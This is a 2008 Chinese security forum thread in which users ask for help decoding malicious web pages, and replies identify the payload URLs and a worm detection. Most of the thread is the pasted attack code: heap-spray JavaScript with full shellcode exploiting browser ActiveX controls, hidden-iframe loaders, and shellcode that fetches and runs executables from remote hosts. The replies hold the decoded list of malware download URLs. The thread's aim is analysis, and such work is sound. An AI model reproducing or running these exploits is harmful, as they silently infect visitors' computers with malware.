求高手解密网页病毒

显示全部楼层 · 发表于 2008-4-5 19:38:21

hxxp://k.j8j8.biz/112/1.htm
hxxp://k.j8j8.biz/112/lz.htm
hxxp://k.j8j8.biz/112/real.htm
[url=http://k.j8j8.biz/112/14.htm]hxxp://k.j8j8.biz/112/14.htm[/url]
<object classid="clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93" id="obj">
      </object>
  <script language="JavaScript" defer>
function goodflow() {
var shellcode1 = unescape("%u9090%u6090%u17eb%u645e%u30a1%u0000" +
"%u0500%u0800%u0000%uf88b%u00b9%u0004%uf300%uffa4%ue8e0" +
"%uffe4%uffff%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad" +
"%u0870%uec81%u0200%u0000%uec8b%ue8bb%u020f%u8b00%u8503" +
"%u0fc0%ubb85%u0000%uff00%ue903%u0221%u0000%u895b%u205d" +
"%u6856%ufe98%u0e8a%ub1e8%u0000%u8900%u0c45%u6856%u4e8e" +
"%uec0e%ua3e8%u0000%u8900%u0445%u6856%u79c1%ub8e5%u95e8" +
"%u0000%u8900%u1c45%u6856%uc61b%u7946%u87e8%u0000%u8900" +
"%u1045%u6856%ufcaa%u7c0d%u79e8%u0000%u8900%u0845%u6856" +
"%u84e7%ub469%u6be8%u0000%u8900%u1445%ue0bb%u020f%u8900" +
"%u3303%uc7f6%u2845%u5255%u4d4c%u45c7%u4f2c%u004e%u8d00" +
"%u285d%uff53%u0455%u6850%u1a36%u702f%u3fe8%u0000%u8900" +
"%u2445%u7f6a%u5d8d%u5328%u55ff%uc71c%u0544%u5c28%u652e" +
"%uc778%u0544%u652c%u0000%u5600%u8d56%u287d%uff57%u2075" +
"%uff56%u2455%u5756%u55ff%ue80c%u0062%u0000%uc481%u0200" +
"%u0000%u3361%uc2c0%u0004%u8b55%u51ec%u8b53%u087d%u5d8b" +
"%u560c%u738b%u8b3c%u1e74%u0378%u56f3%u768b%u0320%u33f3" +
"%u49c9%uad41%uc303%u3356%u0ff6%u10be%uf23a%u0874%ucec1" +
"%u030d%u40f2%uf1eb%ufe3b%u755e%u5ae5%ueb8b%u5a8b%u0324" +
"%u66dd%u0c8b%u8b4b%u1c5a%udd03%u048b%u038b%u5ec5%u595b" +
"%uc25d%u0008%u92e9%u0000%u5e00%u80bf%u020c%ub900%u0100" +
"%u0000%ua4f3%uec81%u0100%u0000%ufc8b%uc783%uc710%u6e07" +
"%u6474%uc76c%u0447%u006c%u0000%uff57%u0455%u4589%uc724" +
"%u5207%u6c74%uc741%u0447%u6c6c%u636f%u47c7%u6108%u6574" +
"%uc748%u0c47%u6165%u0070%u5057%u55ff%u8b08%ub8f0%u0fe4" +
"%u0002%u3089%u07c7%u736d%u6376%u47c7%u7204%u0074%u5700" +
"%u55ff%u8b04%u3c48%u8c8b%u8008%u0000%u3900%u0834%u0474" +
"%uf9e2%u12eb%u348d%u5508%u406a%u046a%uff56%u1055%u06c7" +
"%u0c80%u0002%uc481%u0100%u0000%ue8c3%uff69%uffff%u048b" +
"%u5324%u5251%u5756%uecb9%u020f%u8b00%u8519%u75db%u3350" +
"%u33c9%u83db%u06e8%ub70f%u8118%ufffb%u0015%u7500%u833e" +
"%u06e8%ub70f%u8118%ufffb%u0035%u7500%u8330%u02e8%ub70f" +
"%u8318%u6afb%u2575%uc083%u8b04%ub830%u0fe0%u0002%u0068" +
"%u0000%u6801%u1000%u0000%u006a%u10ff%u0689%u4489%u1824" +
"%uecb9%u020f%uff00%u5f01%u5a5e%u5b59%ue4b8%u020f%uff00" +
"%ue820%ufdda%uffff%u7468%u7074%u2f3a%u762f%u7676%u312e" +
"%u3332%u6b73%u2e79%u6962%u2f7a%u3031%u2f31%u3031%u2e31" +
"%u7865%u0065");
      var bigblock = unescape("%u0C0C%u0C0C");
      var headersize = 20;
      var slackspace = headersize + shellcode1.length;
      while (bigblock.length < slackspace) bigblock += bigblock;
      var fillblock = bigblock.substring(0,slackspace);
      var block = bigblock.substring(0,bigblock.length - slackspace);
      while (block.length + slackspace < 0x40000) block = block + block + fillblock;
      var memory = new Array();
      for (i = 0; i < 300; i++){ memory = block + shellcode1 }
      var buf = '';
      while (buf.length < 32) buf = buf + unescape("%0C");
      var m = obj.Console;
      obj.Console = buf;
      obj.Console = m;
      m = obj.Console;
      obj.Console = buf;
      obj.Console = m;
}
var Then = new Date();
Then.setTime(Then.getTime() + 1*60*60*1000);
Lovezh;
var cookieString = new String(document.cookie);
var cookieHeader = "Cookie2=";
var beginPosition = cookieString.indexOf(cookieHeader);
if (beginPosition == -1)
{
      goodflow();
}

</script>
-----------------------------------------------------------------------------------------------------------

<html>
<script>
document.writeln("<html>");
document.writeln("<object classid=\"clsid:61F5C358-60FB-4A23-A312-D2B556620F20\" id=\'target\'><\/object>");
document.writeln("<body>");
document.writeln("<SCRIPT language=\"javascript\">");
document.writeln("var shellcode = unescape(\"%u9090\"+\"%u9090\"+ ");
document.writeln("       \"%u9090%u6090%u17eb%u645e%u30a1%u0000%u0500%u0800%u0000%uf88b%u00b9\"+ ");
document.writeln("       \"%u0004%uf300%uffa4%ue8e0%uffe4%uffff%ua164%u0030%u0000%u408b%u8b0c\"+ ");
document.writeln("       \"%u1c70%u8bad%u0870%uec81%u0200%u0000%uec8b%ue8bb%u020f%u8b00%u8503\"+ ");
document.writeln("       \"%u0fc0%ubb85%u0000%uff00%ue903%u0221%u0000%u895b%u205d%u6856%ufe98\"+ ");
document.writeln("       \"%u0e8a%ub1e8%u0000%u8900%u0c45%u6856%u4e8e%uec0e%ua3e8%u0000%u8900\"+ ");
document.writeln("       \"%u0445%u6856%u79c1%ub8e5%u95e8%u0000%u8900%u1c45%u6856%uc61b%u7946\"+ ");
document.writeln("       \"%u87e8%u0000%u8900%u1045%u6856%ufcaa%u7c0d%u79e8%u0000%u8900%u0845\"+ ");
document.writeln("       \"%u6856%u84e7%ub469%u6be8%u0000%u8900%u1445%ue0bb%u020f%u8900%u3303\"+ ");
document.writeln("       \"%uc7f6%u2845%u5255%u4d4c%u45c7%u4f2c%u004e%u8d00%u285d%uff53%u0455\"+ ");
document.writeln("       \"%u6850%u1a36%u702f%u3fe8%u0000%u8900%u2445%u7f6a%u5d8d%u5328%u55ff\"+ ");
document.writeln("       \"%uc71c%u0544%u5c28%u652e%uc778%u0544%u652c%u0000%u5600%u8d56%u287d\"+ ");
document.writeln("       \"%uff57%u2075%uff56%u2455%u5756%u55ff%ue80c%u0062%u0000%uc481%u0200\"+ ");
document.writeln("       \"%u0000%u3361%uc2c0%u0004%u8b55%u51ec%u8b53%u087d%u5d8b%u560c%u738b\"+ ");
document.writeln("       \"%u8b3c%u1e74%u0378%u56f3%u768b%u0320%u33f3%u49c9%uad41%uc303%u3356\"+ ");
document.writeln("       \"%u0ff6%u10be%uf23a%u0874%ucec1%u030d%u40f2%uf1eb%ufe3b%u755e%u5ae5\"+ ");
document.writeln("       \"%ueb8b%u5a8b%u0324%u66dd%u0c8b%u8b4b%u1c5a%udd03%u048b%u038b%u5ec5\"+ ");
document.writeln("       \"%u595b%uc25d%u0008%u92e9%u0000%u5e00%u80bf%u020c%ub900%u0100%u0000\"+ ");
document.writeln("       \"%ua4f3%uec81%u0100%u0000%ufc8b%uc783%uc710%u6e07%u6474%uc76c%u0447\"+ ");
document.writeln("       \"%u006c%u0000%uff57%u0455%u4589%uc724%u5207%u6c74%uc741%u0447%u6c6c\"+ ");
document.writeln("       \"%u636f%u47c7%u6108%u6574%uc748%u0c47%u6165%u0070%u5057%u55ff%u8b08\"+ ");
document.writeln("       \"%ub8f0%u0fe4%u0002%u3089%u07c7%u736d%u6376%u47c7%u7204%u0074%u5700\"+ ");
document.writeln("       \"%u55ff%u8b04%u3c48%u8c8b%u8008%u0000%u3900%u0834%u0474%uf9e2%u12eb\"+ ");
document.writeln("       \"%u348d%u5508%u406a%u046a%uff56%u1055%u06c7%u0c80%u0002%uc481%u0100\"+ ");
document.writeln("       \"%u0000%ue8c3%uff69%uffff%u048b%u5324%u5251%u5756%uecb9%u020f%u8b00\"+ ");
document.writeln("       \"%u8519%u75db%u3350%u33c9%u83db%u06e8%ub70f%u8118%ufffb%u0015%u7500\"+ ");
document.writeln("       \"%u833e%u06e8%ub70f%u8118%ufffb%u0035%u7500%u8330%u02e8%ub70f%u8318\"+ ");
document.writeln("       \"%u6afb%u2575%uc083%u8b04%ub830%u0fe0%u0002%u0068%u0000%u6801%u1000\"+ ");
document.writeln("       \"%u0000%u006a%u10ff%u0689%u4489%u1824%uecb9%u020f%uff00%u5f01%u5a5e\"+ ");
document.writeln("       \"%u5b59%ue4b8%u020f%uff00%ue820%ufdda%uffff\"+ ");
document.writeln("       \"%u7468%u7074%u2f3a%u762f%u7676%u312e%u3332%u6b73%u2e79%u6962%u2f7a%u3031%u2f33%u3031%u2e33%u7865%u0065\");");
document.writeln("var bigblock = unescape(\"%u9090%u9090\");");
document.writeln("var headersize = 20;");
document.writeln("var slackspace = headersize+shellcode.length;");
document.writeln("while (bigblock.length<slackspace) bigblock+=bigblock;");
document.writeln("fillblock = bigblock.substring(0, slackspace);");
document.writeln("block = bigblock.substring(0, bigblock.length-slackspace);");
document.writeln("while(block.length+slackspace<0x40000) block = block+block+fillblock;");
document.writeln("memory = new Array();");
document.writeln("for (x=0; x<300; x++) memory[x] = block +shellcode;");
document.writeln("var buffer = \'\';");
document.writeln("while (buffer.length < 1319) buffer+=\"A\";");
document.writeln("buffer=buffer+\"\\x0a\\x0a\\x0a\\x0a\"+buffer;");
document.writeln("target.hgs_startNotify(buffer);");
document.writeln("<\/script>");
document.writeln("<\/body>");
document.writeln("<\/html>")
</script>
</html>
------------------------------------------------------------------------------------------------
<html>
<script>window.onerror=function(){return true;}</script>
<SCRIPT LANGUAGE="JavaScript">
if(document.cookie.indexOf('OK')==-1){
      try{
            var e;
            var ado=(document.createElement("object"));
            ado.setAttribute("\x63\x6c\x61\x73\x73\x69\x64","\x63\x6c\x73\x69\x64\x3a\x42\x44\x39\x36\x43\x35\x35\x36\x2d\x36\x35\x41\x33\x2d\x31\x31\x44\x30\x2d\x39\x38\x33\x41\x2d\x30\x30\x43\x30\x34\x46\x43\x32\x39\x45\x33\x36");
            var as=ado.createobject("\x41\x64\x6f\x64\x62\x2e\x53\x74\x72\x65\x61\x6d","")
      }catch(e){

      };
      finally{
            var expires=new Date();
            expires.setTime(expires.getTime()+24*60*60*1000);
            document.cookie='Tyi=Buf1;path=/;expires='+expires.toGMTString();
            if(e!="[object Error]"){
                     document.write("<iframe width=0 height=0 src=14.htm></iframe>")
            }else {
                     try{
                              var f;
                              var storm=new ActiveXObject("rmocx.RealPlayer RAM Download Handler.1")
                     }catch(f){

                     };
                     finally{
                              if(f!="[object Error]"){
                                    document.write("<iframe width=0 height=0 src=real.htm></iframe>")
                              }
                     }try{
                              var h;
                              var yahoo=new ActiveXObject("GLCHAT.GLChatCtrl.1")
                     }catch(h){

                     };
                     finally{
                              if(h!="[object Error]"){
                                    document.write("<iframe width=0 height=0 src=lz.htm></iframe>")
                              }
                     }try{
                              var k;
                              var Fuck=new ActiveXObject("BaiduBar.Tool")
                     }catch(k){
                     };
                     finally{
                              if(k!="[object Error]"){
                                    Fuck["\x44\x6c\x6f\x61\x64\x44\x53"]("http://ww.baidu.com/new.cab","\x6e\x65\x77\x2e\x65\x78\x65",0)
                              }

                     }if(f=="[object Error]"&&h=="[object Error]"&&k=="[object Error]"){
                              location.replace("about:blank")
                     }
            }
      }
}
</script>
</html>

[ 本帖最后由 qq890 于 2008-4-5 19:39 编辑 ]

显示全部楼层 · 发表于 2008-4-5 19:41:00

FreShow多点几次解码就完事了。呵呵！这网很好很熟悉！

显示全部楼层 · 发表于 2008-4-5 19:41:46

用freshow ESC一下就好了

还是那个批量
http://vvv.123sky.biz/(*)/(*).exe

显示全部楼层 · 发表于 2008-4-5 19:43:42

Log is generated by FreShow.
[wide]http://k.j8j8.biz/112/1.htm
[object]http://ww.baidu.com/new.cab
[frame]http://k.j8j8.biz/112/14.htm
      [object]http://vvv.123sky.biz/112/112.exe
[frame]http://k.j8j8.biz/112/real.htm
      [object]http://vvv.123sky.biz/101/101.exe
[frame]http://k.j8j8.biz/112/lz.htm
      [object]http://vvv.123sky.biz/103/103.exe

显示全部楼层 · 发表于 2008-4-5 19:43:42

http://vvv.123sky.biz/112/112.exe ?

显示全部楼层 · 发表于 2008-4-5 19:44:56

请问?3楼的freshow ESC 在哪下?

显示全部楼层 · 发表于 2008-4-5 19:46:11

蠕虫名称:Worm.Win32.Anilogo.nu

程序:
C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\TEMPORARY INTERNET FILES\CONTENT.IE5\52XAA6XU\112[1].EXE
是蠕虫程序!
已成功阻止其运行,是否要删除此文件?

显示全部楼层 · 发表于 2008-4-5 19:52:36

vvv.123sky.biz是第几次出现呢？

显示全部楼层 · 发表于 2008-4-5 19:58:43

原帖由 tanlimo 于 2008-4-5 19:52 发表
vvv.123sky.biz是第几次出现呢？

具体没纪录！

显示全部楼层 · 发表于 2008-4-5 20:06:36

原帖由 qq890 于 2008-4-5 19:44 发表
请问?3楼的freshow ESC 在哪下?

论坛搜索：Freshow

[已鉴定] 求高手解密网页病毒